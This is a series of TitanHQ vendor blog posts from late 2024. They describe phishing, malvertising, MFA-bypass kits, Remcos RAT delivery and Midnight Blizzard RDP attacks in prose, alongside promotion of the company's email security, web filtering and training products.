It is important to provide regular security awareness training to the workforce, including all employees and the C-suite. The most effective training is provided regularly in small chunks, building up knowledge of threats and reinforcing security best practices. This is easiest with a modular computer-based training course. When new tactics such as email bombing are identified, they can be easily incorporated into the training course and rolled out to end users to improve awareness of specific tactics. Also consider running phishing simulations, as these have been shown to be highly effective at reinforcing training and identifying knowledge gaps that can be addressed through further training.
TitanHQ makes this as easy as possible with the SafeTitan security awareness training and phishing simulation platform. The platform includes hundreds of engaging and enjoyable training modules covering all aspects of security and threats employees need to be aware of, while the phishing simulation platform makes it easy to create and automate internal phishing simulations, which automatically trigger relevant training content if the user fails the simulation.
Give the TitanHQ team a call today for further information on SpamTitan and Safetitan, for a product demonstration, or to arrange a free trial.
by titanadmin | Nov 30, 2024 | Internet Security, Phishing & Email Spam |
Holiday season officially started the day after Thanksgiving in the United States, or Black Friday as it is now known. Taking its name from a term used by police officers in Philadelphia to describe the chaos in the city caused by the deluge of suburban shoppers heading to the city to do their holiday shopping, it has become a day when retailers offer bargains to entice the public to buy their goods and services. While the jury is still out on how good many of those bargains are, the consensus is that there are bargains to be found in stores and online, with the official day for the latter being the Monday after Black Friday – Cyber Monday.
The holiday season for shoppers is boom time for cybercriminals who take advantage of the increase in online shoppers looking to buy gifts for Christmas and pick up a bargain of two. Many people time major purchases to take advantage of Black Friday and Cyber Monday offers and cybercriminals are poised to pounce on the unwary. The losses to scams over the holiday period are staggering. According to the Federal Bureau of Investigation (FBI), more than $73 million was lost to holiday season scams in 2022; however, the true total is likely to be considerably higher since many losses go unreported. Those figures do not include the losses to phishing, malware, ransomware, BEC attacks, and other cyberattacks that occur over the holiday period. For instance, the surge in ransomware attacks over Thanksgiving weekend and Christmas when the IT staff is spread thin.
Given the heightened risk of scams and cyberattacks over the holiday season, consumers should be on their guard and take extra care online and ensure that vendors are legitimate before handing over their card details and double-checking the legitimacy of any email requests. While consumers face elevated risks during the holiday season, so do businesses. There are end-of-year deadlines to meet and it’s a short month with many workers taking annual leave over Christmas and the New Year. As the year draws to a close it is common for vigilance to slip, and threat actors are ready to take advantage. Businesses need to ensure that their defenses are up to scratch, especially against phishing – the most common initial access vector in cyberattacks – as a slip in vigilance can easily lead to a costly cyberattack.
Businesses can take several proactive steps to ensure they are protected against holiday season cyber threats, and conducting a security awareness training session is a good place to start. Employees should be reminded about the increase in malicious cyber activity over the holiday period and be reminded about the risks they may encounter online, via email, SMS, instant messaging services, and the phone. With TitanHQ’s SafeTitan security awareness training platform, it is easy to spin up training courses for employees to remind them to be vigilant and warn them about seasonal and other cyber threats. The training platform makes it quick and easy to create and automate training courses, with the training delivered in modules of no more than 10 minutes to ensure employees can maintain concentration and fit the training into their workflows. The SafeTitan platform also incorporates a phishing simulator, which businesses can use to reinforce training and identify individuals who are fooled by phishing scams and ensure they receive the additional training they need.
Due to the high risk of phishing attacks, it is a good idea to implement an advanced spam filter service, one that reliably identifies and neutralizes phishing and business email compromise attempts and provides cutting-edge protection against malware. You need look no further than SpamTitan for that protection. SpamTitan incorporates machine learning and AI-based detection capabilities for detecting phishing, BEC, and scam emails, and dual antivirus engines and email sandboxing for detecting malware threats, including novel malware variants. In Q3, VirusBulletin’s tests of SpamTitan confirmed a phishing detection rate of 99.99% and a malware catch rate of 99.511%. The interim figures for November 2024 are a 100% phishing catch rate and a 100% malware catch rate, demonstrating the reliability of TitanHQ’s cloud-based email filtering solution.
TitanHQ also offers online protection through the WebTitan DNS filter, which prevents access to known malicious websites, blocks malware downloads from the Internet, and can be used to control the web content employees can access, providing an important extra layer of security against web-based threats. At TitanHQ we hope you have a happy holiday period and above all else that you are well protected against cyber threats. Give the team a call today to find out more about how we can help protect your business this holiday season and beyond.
by titanadmin | Nov 30, 2024 | Phishing & Email Spam |
A phishing campaign has been identified that targets law firms by impersonating U.S. federal courts and purports to contain an electronic notice of court filings. Like many similar campaigns in recent months, the campaign aims to trick law firm employees into downloading malware that provides the threat actor with persistent access to the law firm’s network.
Threat actors often target businesses, but a far more effective use of their time and resources is to target vendors. If a threat actor gains access to a vendor’s network, they can potentially use the vendor’s privileged access to attack all downstream clients. Even when a vendor does not have privileged access to client networks, they are likely to store large amounts of data from multiple clients. In the case of law firms, that data is highly sensitive and easily monetized. It can be easily sold on darknet marketplaces and be used as leverage to extort the law firm and its clients.
Over the last few years, law firms have been extensively targeted by threat actors for this very reason. According to a 2023 report from the UK’s National Cyber Security Centre, 65% of law firms have been a victim of a cyber incident and a 2024 report from the chartered accountancy firm Lubbock Fine indicates cyberattacks on law firms have increased by 77% year-over-year. The main motivation for these attacks is extortion and ransomware attacks. There has also been a surge in business email compromise (BEC) attacks on law firms, as they are typically involved in large financial transactions that threat actors can try to divert to their own accounts.
One of the latest campaigns seeks persistent access to the networks of law firms by tricking the firms into installing malware. The campaign came to light following multiple complaints about fake notices of electronic court filings, which prompted the U.S. federal judiciary to issue a warning to U.S. lawyers to be alert to email notifications that purport to be notifications from the courts. The emails impersonate the PACER case management and electronic case files system, and instruct the recipient to respond immediately. The judiciary advised law firms to always check the federal judiciary’s official electronic filing system and never open attachments in emails or download files from unofficial sources.
The intercepted emails impersonate lower courts and prompt the recipient to click an embedded hyperlink to access a document from a cloud-based repository. Clicking the link directs the user to a malicious website where they are prompted to download a file. Opening the file triggers the installation of malware that will give the threat actor the access they need for an extensive compromise. The campaign will undoubtedly result in the theft of sensitive data and attempted extortion.
Most law firms will be well aware that they are prime targets for threat actors and the importance of implementing robust cybersecurity defenses. Since phishing is the most common way that threat actors get access to their networks and sensitive data, it is vital for law firms to ensure that they have an effective email security solution – one that is capable of detecting and blocking malware and correctly classifying phishing and BEC emails. This is an area where TitanHQ can help. TitanHQ offers a suite of cutting-edge cybersecurity solutions that provide multiple layers of protection against the most common attack vectors.
The primary defense against phishing and BEC attacks is anti-spam software, which TitanHQ can provide as a cloud-based anti-spam service or virtual anti-spam appliance that can be installed on-premises on existing hardware. The SpamTitan solution incorporates dual anti-virus engines and email sandboxing for detecting malware and malicious code in email attachments, even zero-day malware threats. The solution has machine learning capabilities for detecting novel email threats such as phishing and BEC attacks that are needed to detect and block the latest AI-generated threats. In independent tests by Virus Bulletin in November 2024 on 125,000 emails, SpamTitan had a 100% malware and phishing catch rate and only miscategorized 2 benign spam emails.
It is also important to ensure that all lawyers and support staff are made aware of the latest threats and receive regular cybersecurity awareness training. TitanHQ offers a comprehensive security awareness training platform (SafeTitan) and phishing simulator that makes it easy to create effective, ongoing training programs that incorporate training material on the latest threats. Give the TitanHQ team a call today for more information on these and other cybersecurity solutions and for advice on improving your cybersecurity defenses against the most common attack vectors.
by titanadmin | Nov 29, 2024 | Phishing & Email Spam |
A new phishing scam uses Microsoft Visio files to bypass phishing defenses to steal Microsoft 365 credentials. Microsoft Visio is a diagramming and vector graphics application used to create a variety of diagrams, including building plans, data flow diagrams, organizational charts, and flowcharts. While the software is widely used by businesses, Visio files are unlikely to feature heavily in security awareness training courses as they are not commonly used in phishing campaigns or for malware delivery. Security awareness training tends to focus on the most common file types such as documents, spreadsheets, and executable files. Unfamiliarity with the file type should mean employees exercise extreme caution; however, since Visio is part of the Microsoft 365 family, the files may be trusted and opened.
To increase the chance of that, this campaign uses compromised accounts to send the phishing emails. By using trusted accounts there is less chance of the emails being identified by email security solutions as malicious since emails are likely to pass reputation and authentication checks. It also increases the chance of emails being opened, as employees are trained to be suspicious of emails from unknown senders and generally trust emails from known senders. Like countless other phishing campaigns, tried and tested lures are used to get the recipient to open the attached .vsdx file. In this campaign the phishing emails masquerade as a purchase order and business proposals. Also observed in this campaign is the use of an Outlook message attachment, with that message including the malicious Visio file. Some emails use hyperlinks instead which direct the recipient to a SharePoint page hosting the Visio file. The latter helps to ensure that the email message is not blocked by email security solutions, which typically trust SharePoint URLs.
If the Visio file is opened, the user will be presented with branding that makes the file appear legitimate and they are advised to click an embedded link to view the contents of the file. The user is told to hold down the CTRL key when they click the link – an additional measure for evading security solutions. That link directs the user to a URL that hosts a spoofed login page that prompts them to enter their Microsoft credentials, which are captured by the threat actor.
While the use of Visio files for phishing is not common, there has been an increase in the use of these files as threat actors look for more reliable methods of phishing. It is certainly worthwhile ensuring that these file types are covered in your security awareness training programs and phishing simulations. While it is important to train employees to be aware of the latest tactics, techniques, and procedures used by threat actors to steal credentials, having an advanced email security solution in place can ensure that these malicious emails do not reach their targets. One of the easiest ways to block the threat, given that these are not commonly used files, is to configure your spam filter to block/quarantine emails containing .vsdx attachments, and certainly to do so for users who do not need to use these file types for work purposes. This is straightforward with SpamTitan (see our Help section).
If it is not practical to block these file types, SpamTitan does incorporate a variety of safeguards for preventing the delivery of malicious messages, including email sandboxing for deep analysis of file attachments to identify malicious URLs (and malware) and machine learning to identify emails that deviate from the messages typically received by the user/business. These features are critical, since the messages in this campaign are sent from compromised email accounts that are potentially trusted.
If you are not a SpamTitan user, give the TitanHQ team a call to find out more about the solution and why so many businesses are switching to SpamTitan for email security and check out this post, which highlights SpamTitan’s 100% malware and phishing block rate in recent tests.
by titanadmin | Nov 29, 2024 | Phishing & Email Spam |
Cybercriminals are increasingly leveraging SVG files in their email campaigns. These file attachments have been used as part of convincing campaigns that have fooled many end users into disclosing their credentials or installing malware.
SVG files, or Scalable Vector Graphics files to give them their full name, differ from standard image files such as BMP, JPG, and PNG files. Vector graphics are constructed using mathematical formulas that establish points on a grid, rather than specific blocks of color (pixels). The advantage of vector graphics files is that they can be scaled infinitely with no loss of resolution, something that cannot be done with pixel-based images. Vector files are often used for logos, as they can be scaled up easily to be used in billboards with no loss of resolution, and they are increasingly being used on the web as the images will display correctly regardless of the size of the browser window or screen.
SVG is an incredibly versatile file format that can incorporate elements other than the image code, for instance, SVG files can be used to display HTML. It is possible to create an SVG image file that incorporates HTML and executes JavaScript on loading, redirecting users to a malicious website such as a phishing landing page. Images can be created that incorporate clickable download buttons, which will download payloads from a remote URL. An end user could easily be tricked into downloading a file with a double extension that appears to be a PDF file but is actually a malware executable.
Some of the recently intercepted phishing emails have included an SVG file that displays an image of an Excel spreadsheet. Since the spreadsheet is an image, the user cannot interact with it, but it includes an embedded form that mimics the Microsoft 365 login prompt. If the user enters their credentials into that form, they are transmitted to the threat actor. One of the problems with this type of file format is it is not generally blocked by anti-spam software, so is likely to be delivered to inboxes.
While SVG and other vector graphics file formats are invaluable for design and can be found extensively on the web, they are not generally used for image sharing, so the easiest way to protect against these malicious campaigns is to configure your spam filtering service to block or quarantine emails containing SVG file attachments, at least for employees who do not usually work with these file formats. If you have a cloud-based anti-spam service that incorporates email sandboxing, where attachments are sent for deep analysis, it is possible to detect SVG files that incorporate malicious JavaScript. Since the use of these file formats is increasing, it is important to make your employees aware of the threat through security awareness training. Emails with SVG file attachments should also be incorporated into your phishing simulations to determine whether employees open these files. Both are easy with the SafeTitan security awareness training and phishing simulation platform.
by titanadmin | Nov 28, 2024 | Phishing & Email Spam |
A large-scale phishing campaign has been identified that abuses the e-signature software DocuSign, a hugely popular software solution used to legally and securely sign digital documents and eliminate the time-consuming process of manually signing documents.
DocuSign uses “envelopes” to send documents to individuals for signing. These document containers may contain one or more documents that need to be signed, and the envelopes are sent via email. In this campaign, a bad actor abuses the DocuSign Envelopes API to create fake invoices, which are mass-distributed via email. This campaign aims to get the recipient of the invoice to sign it using DocuSign, then the signed document can be used for the next phase of the scam, which typically involves sending the signed document to the billing department for payment, which may or may not be through DocuSign. The invoices generated for this campaign are based on legitimate DocuSign templates and are generated through a legitimate DocuSign account. The invoices include legitimate branding for DocuSign and the company/product the threat actor is impersonating – such as Norton Internet Security, PayPal, and other big-name brands.
The problem for businesses with this campaign is the emails are sent from the genuine docusign[.]net domain, which means email security solutions are unlikely to block the messages since the domain is trusted. Since the emails appear to be legitimate invoices with genuine branding and the correct invoice amount for the product being spoofed, end users are likely to be tricked by the emails. The tactics used in this campaign are similar to others that have abused legitimate cloud-based services to bypass email security solutions, such as sending malicious URLs in documents hosted on Google Docs and Microsoft SharePoint.
The primary defense against these campaigns is security awareness training. Businesses need to make their employees aware of campaigns such as these messages, which often bypass email security solutions and are likely to land in inboxes since they may not contain any malicious URLs or malware code and are sent from a legitimate, trusted domain. The workforce needs to be trained on cybersecurity best practices and told about the red flags in emails that are indicative of a scam. Training needs to be provided continuously to make employees aware of the latest scams, as bad actors are constantly refining their tactics, techniques, and procedures, and developing new ways to trick end users. The easiest way to do this is with a comprehensive security awareness training solution such as SafeTitan.
SafeTitan makes it easy to create training programs for different roles in the organization and automate these training programs to ensure training content is delivered in manageable chunks, with new content added and rolled out in response to the latest threats. These training programs should be augmented with phishing simulations. An email security solution with AI and machine-learning capabilities is also important, as standard spam software is not effective at identifying threats from legitimate and trusted cloud services. TitanHQ’s PhishTitan solution for Microsoft 365 has these capabilities and identifies the phishing emails that Microsoft often misses. PhishTitan scans inbound messages for malicious content, uses email sandboxing for detecting zero-day threats, adds banners to emails from external sources, and allows security teams to rapidly remediate identified threats throughout the entire email environment. In November 2024, Virus Bulletin assessed the engine that powers the SpamTitan spam filtering service and PhishTitan anti-phishing solution using around 125,000 emails. SpamTitan and PhishTitan blocked 100% of malware and 100% of phishing emails and only miscategorized 2 benign spam emails, demonstrating how effective these solutions are at blocking malicious emails.
For more information on improving your defenses against malicious email campaigns through cutting-edge email security and security awareness training, give the TitanHQ team a call today.
by titanadmin | Nov 26, 2024 | Phishing & Email Spam, Spam Software |
It is all too easy to place too much reliance on multifactor authentication (MFA) to protect against phishing attacks. In theory, if an employee is duped by a phishing email and their credentials are stolen, MFA should stop the threat actor from using those credentials to access the account, as they will not have the necessary additional authentication factor(s). The reality is somewhat different. While MFA can – and does – block many attacks where credentials have been obtained, it is far from infallible. MFA has made it much harder to compromise accounts but, in response, threat actors have developed new tactics to bypass MFA protections.
For example, there is a scam where an employee is contacted by an individual who claims to be from their IT department. The scammer tells them there is an issue with their account and they need to update their password. They are directed to a site where they are prompted to enter their password and enter the MFA code sent to their phone. The threat actor uses that information in real-time to access their account. Multiple campaigns have targeted IT helpdesk staff, with the threat actor impersonating an employee. They provide information to verify their identity (obtained in an earlier phase of the campaign) and ask to register a new device to receive their MFA codes.
Phishing-as-a-service toolkits (PhaaS) capable of defeating MFA are advertised on hacking forums and Telegram channels that can be purchased or rented. They involve an adversary-in-the-middle (AitM) attack and use a reverse proxy between the victim and the legitimate portal for the credentials being sought. The user is directed to a login page that appears exactly as expected, as the user is logging into the genuine site. What is unknown to the user is the attacker sits between them and the site and captures credentials and the session cookie after MFA is successfully navigated. The attacker then has access to the account for the duration of the session cookie and can register a new device to receive future codes.
PhaaS kits are a serious threat and are proving popular with cybercriminals. Take the Rockstar 2FA kit for example, which is advertised for $200 for a 2-week subscription. The kit includes everything a phisher needs, including MFA bypass, login pages for targeting specific credentials, session cookie harvesting, undetectable malicious (FUD) links and link redirectors, a host of phishing templates, and an easy-to-use admin panel that allows tracking of phishing campaigns. The phishing URLs available are also hosted on legitimate services such as Google Docs Viewer, Microsoft OneDrive, and LiveAgent – sites commonly trusted by email security solutions. This is just one phishing kit. There are many being offered with similar capabilities.
The take-home message is that MFA, while important, can be bypassed. For maximum protection, phishing-resistant multifactor authentication should be used – e.g. smartcards or FIDO security keys. These MFA tools can be expensive to implement, so at the very least ensure that you have some form of MFA implemented and implement several other layers of defenses. An advanced spam filtering service such as SpamTitan is essential, as it can block phishing emails to ensure they do not reach end users. Review sites often rate SpamTitan as one of the best spam filters for business due to how easy the solution is to use and its excellent detection rate. In November 2024, in tests by Virus Bulletin, SpamTitan blocked 100% of malware and 100% of phishing emails out of a test involving around 125,000 messages. Previous assessments had a catch rate of more than 99.99%, demonstrating the reliability and accuracy of the solution.
Another layer of protection can be provided by a web filter, which will block attempts to visit known malicious websites, such as those used for phishing and malware distribution. WebTitan provides time-of-click protection, as does TitanHQ’s PhishTitan product – an anti-phishing solution specifically developed to protect M365 accounts against phishing by augmenting Microsoft’s controls to catch the phishing emails that EOP and Defender miss.
Technical defenses are important, but so too is workforce training. Through regular security awareness training and phishing simulations, employees can be taught cybersecurity best practices and how to identify and avoid scam emails. If you want to improve your defenses against phishing and malware, give the TitanHQ team a call and have a chat about your options. All TitanHQ solutions are easy to use, are available on a free trial, and full product support is provided during that trial.
by titanadmin | Nov 25, 2024 | Internet Security |
Most cyberattacks start with phishing so businesses need to ensure they have advanced spam filter service capable of accurately identifying and remediating phishing attempts, with robust anti-malware capabilities such as email sandboxing to combat the growing volume of zero-day malware threats. While security teams are all too aware of the threat of phishing, another attack vector is on the rise – malvertising.
Malvertising, or malicious advertising, is the use of deceptive adverts that direct users to malicious web pages. These malicious pages are used to steal sensitive information, infect visitors with malware, and direct users to a wide range of scams. Malvertising can appear on legitimate websites that have been compromised by threat actors and through third-party ad blocks that many legitimate website owners use to boost revenue. They are also commonly encountered on search engines and may appear in prominent positions, placed above the organic listings for key search terms.
Advertisers, including Google, have checks in place and vet advertisers to ensure malicious adverts do not make it onto their networks, but despite robust controls, many malicious adverts are displayed in the search engine results and are pushed out to hundreds of legitimate websites. These adverts may only be short-lived but they are active for long enough to get huge numbers of views and many clicks. Given the increase in malvertising, this method of contact with end users is proving profitable for cybercriminals.
Recent Examples of Malvertising Campaigns
At the start of the month, a new malvertising campaign was detected that used Meta business accounts and personal Facebook accounts to abuse the Meta advertising platform to display malicious ads. Many different ads were used for the campaign, with the common theme being adverts for well-known software tools including CapCut, Office 365, Canva, video streaming services such as Netflix, video games, and many more. The adverts appeared to primarily target middle-aged men.
The threat actor behind the campaign used almost 100 malicious domains according to the Bitdefender analysis, served several thousand ads, and undoubtedly reached tens of thousands of users. The aim of the campaign was to distribute an information stealer called SYS01stealer. SYS01stealer is used to steal login credentials and other sensitive data, including browser histories, cookies and Facebook ad and business account data. The Facebook data was used to compromise Facebook accounts which are used to create further malicious adverts to scale up the operation.
Another Facebook malvertising campaign targeted Facebook users in Europe, in this case, the threat actor used fraudulent ads for the Bitwarden password manager. The ads claimed to offer security updates and showed alerts about compromised passwords. Clicking the ad directs the user to a web page spoofing the Chrome web store, which delivers a browser extension. If granted permissions, the extension could alter network requests and access sites, cookies, and storage. The installation also launches JavaScript which exfiltrates task data, cookies, and Facebook details for personal and business accounts.
A campaign identified by Malwarebytes in November targeted eBay users. The malicious adverts were served via Google Ads and the campaign involved at least four different advertiser accounts. In this campaign, the aim was to trick people into calling an eBay support number which was a tech support scam.
Because the adverts often appear on trusted websites, including websites that are frequently visited, they fool a great many people who mistakenly trust that the adverts are genuine.
How Should Businesses Deal with the Malvertising Threat?
The primary defense for consumers is vigilance. Just because an advert appears on a trusted website or search engine, does not mean that the advert is genuine. As is the case with carefully checking links in emails and the domains to which those links direct, the domain and URL should be carefully checked to make sure it is a legitimate vendor.
Businesses can easily protect against malvertising by using a web filter such as WebTitan. WebTitan is a DNS filter that blocks access to all known malicious websites and receives consistent threat intelligence to protect against zero-minute threats. WebTitan can be configured to block downloads of certain file types from the Internet, such as executable files to block malware delivery and prevent the installation of unauthorized software products, which often sideload unwanted programs. WebTitan can also be used to prevent employees – on or off the network – from visiting any of 53 categories of websites, with a further 8 customizable categories giving granular control over the content that users can access.
Businesses should also raise awareness of the threat of malvertising through security awareness training. The SafeTitan security awareness training platform includes training modules on malvertising and hundreds of training modules covering other threats to improve human defenses against phishing, malware, and scams.
WebTitan is available on a free trial, with full support provided throughout the trial. For more information on WebTitan and to book a product demonstration, give the TitanHQ team a call today.
by titanadmin | Nov 25, 2024 | Email Scams, Phishing & Email Spam |
As consumers wait patiently for Black Friday to snaffle a bargain or two, scammers are hard at work perfecting their Black Friday scams and getting ahead of the game by offering amazing deals via email. In the run-up to Black Friday, Cyber Monday, and throughout the holiday season, everyone should be wary of scams and spam emails. The superb offers and hugely discounted prices are not always what they seem. Most are scams.
There are Black Friday and Cyber Monday deals aplenty, with bricks and mortar and online retailers vying to get your business to kick start the holiday season shopping bonanza. Rather than being confined to the weekend, many retailers have offers over an extended period, and marketing for those deals starts well in advance. Black Friday deals seem to be taking over much of November. While there are bargains to be had, even the incredible prices being offered by genuine retailers may not be quite as good as they seem. While Black Friday deals are touted as being the lowest prices of the year, research suggests that is not necessarily the case. According to the consumer group Which? it is common for prices to be inflated in the run-up to Black Friday to make the discounts seem bigger, and in some cases, the price that a retailer claims a product has been reduced from has never been offered in the previous 12 months. It pays to do some research before you buy.
As far as online shopping goes, it is important to visit your favorite retailers’ websites directly and, as a general rule of thumb, never respond to any offers received by email by clicking links. If you get an email from a retailer advising you of a Black Friday deal, visit their website using your bookmark or by typing in the URL. If the offer is available it should be detailed on the website. This is important as the majority of Black Friday emails are scams. According to a recent analysis by Bitdefender – the company that powers the SpamTitan email sandbox – 77% of Black Friday-themed spam were scams, a 7% increase from 2023. Many of these scam emails impersonate big-name brands and offer impressive but fake discounts on products and services. They often lead to financial loss, data theft, and malware infections.
Black Friday scams include offering top-name brands at heavily discounted prices, but actually mailing cheap counterfeit goods or not mailing any product at all. Big-name brands have been impersonated in spam emails that include an attachment that purports to be a shipping confirmation, confirming that orders are ready for shipment when the attachments direct users to websites where they are asked to disclose their credentials or the attachments install malware.
At this time of year there is a surge in survey scams, where consumers are asked to take part in surveys in exchange for a discount or voucher, and after completing the survey are asked to disclose sensitive information that can be used directly for fraud or spear phishing campaigns. If you receive unwanted marketing communications from genuine retailers, you can use the unsubscribe option to update your preferences, but make sure you carefully check the destination of the unsubscribe button and the sender’s email address to confirm the communication is from a legitimate retailer.
If you receive spam emails, the unsubscribe option should be avoided. Using the unsubscribe option lets the scammer know that the account is active, and all that is likely to happen is you will receive even more spam. Far better is to mark the email as spam and block the sender. Clicking an unsubscribe option in an email may direct you to a site where a vulnerability is exploited to download malware.
Businesses should ensure they have an effective spam filter, and it is never more important than in November, December, and January when spammers are highly active. At TitanHQ, we offer products that provide exception protection against spam, scams, phishing emails, and malware. In recent independent tests by VirusBulletin, the engine that powers the SpamTitan spam filtering service and the PhishTitan anti-phishing solution for Microsoft 365 achieved a 100% phishing catch rate, a 100% malware catch rate, and a spam catch rate in excess of 99.9% in November 2024 results. These follow overall scores in excess of 99.99% for blocking spam, phishing, and malware earlier in the year, demonstrating these email security products provide excellent and reliable protection against malicious and spam emails.
by titanadmin | Nov 22, 2024 | Industry News, Phishing & Email Spam |
TitanHQ is thrilled to announce that the engine that powers its email security solutions – SpamTitan and PhishTitan – achieved an incredible 100% catch rate for phishing emails and malware in November 2024 in independent tests by Virus Bulletin.
Virus Bulletin is a testing and certification body that has an excellent reputation within the information security community. Virus Bulletin performs independent tests of security solutions and has been reviewing, benchmarking, and issuing certifications for security products for more than 2 decades.
The spam, malware, and phishing identification tests are conducted over a 16-day period each month, with the final results published each quarter. For the past two quarters, TitanHQ’s email security solutions have achieved VBSpam+ certification, and the results from October and November indicate SpamTitan email security and the PhishTitan anti-phishing solutions are on track to receive their third consecutive quarterly VBSpam+ certification.
The interim results for November are based on an evaluation of almost 125,000 emails. TitanHQ’s solutions correctly identified all malware and phishing emails over that period, and it was nearly a clean sweep of 100% scores; however, there was a narrow miss on blocking non-malicious spam emails, as while the vast majority of spam emails were correctly identified, 2 spam emails were unfortunately miscategorized.
The flawless results for malware blocking and phishing identification by TitanHQ’s cloud-based anti-spam software clearly demonstrate the superb reliability and effectiveness of TitanHQ’s email security solutions and validate what our customers already know – That you can rely on TitanHQ to keep your email accounts free from threats.
“We are thrilled to have significantly outperformed our main competitors and surpassed the industry average,” said Ronan Kavanagh, CEO at TitanHQ. “Our unwavering commitment to providing unmatched email security is evident in these results, and we remain dedicated to protecting our clients from evolving cyber threats.”
In addition to providing a cutting-edge, easy to use, email filtering service, TitanHQ’s cybersecurity portfolio also includes a comprehensive security awareness training and phishing simulation platform – SafeTitan; a DNS-based web filtering solution for blocking Internet threats and controlling internet access – WebTitan; an easy-to-use and cost-effective email archiving solution – ArcTitan; and an email encryption solution for securing sensitive data – EncryptTitan.
All TitanHQ solutions are cloud-based and easy to implement and use, even by individuals with little technical expertise. These solutions can be used by businesses of all sizes and TitanHQ also offers anti-spam solutions for managed service providers to allow them to provide comprehensive security services to their clients.
For more information about these solutions or joining our partner program, give the TitanHQ team a call today and be sure to check out these anti-spam tips.
by titanadmin | Nov 15, 2024 | Phishing & Email Spam |
A phishing campaign has been identified that uses purchase order-related lures and Excel file attachments to deliver the Remcos RAT, a commercially available malware variant that gives threat actors remote access to an infected device. The malware allows the threat actor to log keystrokes, record audio via the microphone, and take screenshots and provides a foothold allowing an extensive compromise. Infection with the Remcos RAT invariably involves data theft and could lead to a ransomware attack and extortion.
Businesses with antivirus software installed are unlikely to be protected. While antivirus software is effective at detecting and neutralizing malware, the Remcos RAT is poorly detected as it is fileless malware that runs in memory and does not install files on the disk. The campaign, detected by researchers at FortiGuard Labs, targets Windows users and starts with a phishing email with an encrypted Excel attachment. The emails purport to be a purchase order and include a malicious Excel file attachment. The Excel file uses OLE objects to exploit an old vulnerability in Office, tracked as CVE-2017-0199. Successful exploitation of the vulnerability will see an HTML Application (HTA) file downloaded, which is launched using mshta.exe. The file is heavily obfuscated to evade security solutions, and its function is to download and execute a binary, which uses process hollowing to download and run the Remcos RAT in the memory.
The Remcos RAT is used to enumerate and terminate processes, execute commands, capture sensitive data, and download additional malware payloads. Since the Remcos RAT runs in the memory, it will not survive a reboot. To achieve persistence, it runs the registry editor (reg.exe) to edit the Windows Registry to add a new auto-run item to ensure it is launched after each reboot.
Since the initial contact is made via email, an advanced email security solution with email sandboxing and AI- and machine learning capabilities should ensure the email is identified as malicious and blocked to prevent delivery. Should the email be delivered and the attachment opened, end users are informed that the document is protected. They are presented with a blurred version of the Excel file and are told they need to enable editing to view the content – a red flag that should be identified by security-aware employees. If that red flag is missed, enabling content will trigger the exploitation of the vulnerability that ultimately delivers the Remcos RAT. Businesses with an advanced DNS-based web filter will have another layer of protection, as the URLs hosting the malicious files should be blocked.
TitanHQ offers cutting-edge cybersecurity solutions that provide exceptional protection against phishing, BEC, and malware attacks, blocking the initial emails and connections to malicious websites to prevent end users from viewing malicious emails (SpamTitan) and preventing malicious file downloads from the Internet (WebTitan). In November 2024 tests by Virus Bulletin, TitanHQ’s SpamTitan Solution had a 100% phishing and malware block rate. TitanHQ also provides a comprehensive security awareness training platform (SafeTitan) to teach cybersecurity best practices and keep employees aware of the latest threats. The platform also incorporates a phishing simulator for reinforcing training. Give the TitanHQ team a call today for more information on TitanHQ solutions and how they can improve your defenses against email, web, SMS, and voice-based threats at your business.
by titanadmin | Oct 31, 2024 | Phishing & Email Spam |
The notorious Russian advanced persistent threat (APT) group Midnight Blizzard (aka Cozy Bear, APT29) has been conducting a massive spear phishing campaign on targets in the United Kingdom, Europe, Australia, and Japan. Midnight Blizzard is a hacking group with strong links to Russia’s Foreign Intelligence Service (SVR) which engages in espionage of foreign interests and seeks persistent access to accounts and devices to steal information of interest to the SVR. The latest campaign is a highly targeted information-gathering exercise that was first observed on October 22, 2024.
While Midnight Blizzard’s spear phishing attacks are usually conducted on government officials and individuals in non-governmental organizations (NGOs), individuals in academia and other sectors have also been targeted. The spear phishing attacks were identified by Microsoft Threat Intelligence which reports that thousands of emails have been sent to more than 100 organizations and the campaign is ongoing. While spear phishing is nothing new, Midnight Blizzard has adopted a new tactic in these attacks and is sending a signed Remote Desktop Protocol (RDP) configuration file as an email attachment, with a variety of lures tailored to the individual being targeted. Some of the intercepted emails impersonated Microsoft, others impersonated cloud service providers, and several of the emails used lures related to zero trust. The email addresses used in this campaign have been previously compromised in other Midnight Blizzard campaigns.
Amazon has also reported that it detected phishing emails that impersonated Amazon Web Services (AWS), attempting to trick the recipients into thinking AWS domains were used; however, the campaign did not seek AWS credentials, as Midnight Blizzard is targeting Windows credentials. Amazon immediately started the process of seizing the domains used by Midnight Blizzard to impersonate AWS and that process is ongoing.
RDP files contain automatic settings and resource mappings and are created when a successful connection to an RDP server occurs. The attached RDP files are signed with a Lets Encrypt certificate and extend features and resources of the local system to a remote server under the attacker’s control. If the RDP file is executed, a connection is made to a server under the control of Midnight Blizzard, and the targeted user’s local device’s resources are bidirectionally mapped to the server.
The server is sent resources including logical hard disks, clipboard contents, printers, connected devices, authentication features, and Windows operating system facilities. The connection allows the attacker to install malware, which is set to execute via AutoStart folders, steal credentials, and download other tools to the user’s device, including remote access trojans to ensure that access to the targeted system is maintained when the RDP session is closed.
Since the emails were sent using email addresses at legitimate organizations, they are unlikely to be flagged as malicious based on reputation checks by anti-spam software, although may be detected by more advanced anti-spam services that incorporate machine learning and AI-based detection mechanisms and email sandboxing. You should configure your spam antivirus filter to block emails containing RDP files and other executable files and configure your firewall to block outbound RDP connection attempts to external or public networks. Multifactor authentication should be configured on all accounts to prevent compromised credentials from granting access, and consider blocking executable files from running via your endpoint security software is the executable file is not on a trusted list. Also, ensure that downloaded files are scanned using antivirus software. A web filter can provide added protection against malicious file downloads from the internet.
An anti-phishing solution should also be considered for augmenting the protection provided through Microsoft Defender and EOP for Microsoft 365. PhishTitan from TitanHQ has been shown to improve protection and block threats that Microsoft’s anti-phishing solution fails to detect, augmenting rather than replacing the protection provided by EOP and Defender. It is also important to provide security awareness training to the workforce and ensure that spear phishing and RDP file attachments are included in the training. Also, consider conducting spear phishing simulations.
by titanadmin | Oct 30, 2024 | Internet Security |
A new malvertising campaign has been identified that abuses the Meta advertising platform to deliver an information stealer malware variant called SYS01 Stealer. Similar to other malvertising campaigns, popular brands are impersonated to trick users into downloading the information stealer in the belief they are installing legitimate software. In this campaign, the impersonated brands include popular software tools that are commonly used by businesses, including the video and imaging editing tools CapCut, Adobe Photoshop, and Canva, as well as productivity tools such as Office 365, instant messaging platforms such as Telegram, VPN providers such as Express VPN, and a host of other software products and services to ensure a wide reach, including video games and streaming services.
